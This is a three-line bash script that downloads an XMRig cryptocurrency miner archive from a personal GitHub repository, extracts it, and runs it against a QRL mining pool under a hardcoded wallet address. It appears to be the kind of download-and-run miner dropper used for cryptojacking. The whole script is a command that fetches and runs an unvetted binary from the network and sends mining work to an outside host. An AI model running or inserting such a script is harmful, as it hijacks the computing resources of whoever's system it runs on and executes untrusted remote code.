#!/bin/bash
wget https://github.com/Adeemar7/all/raw/main/xmrig.tar.gz && tar -xvf xmrig.tar.gz
./xmrig --donate-level 1 -o sg.qrl.herominers.com:1166 -u Q010500093d2b1d1724a345e491cb8d9604672ce932e36f649b0efce8880c42562a07b020a0dddc -p mirna -a rx/0
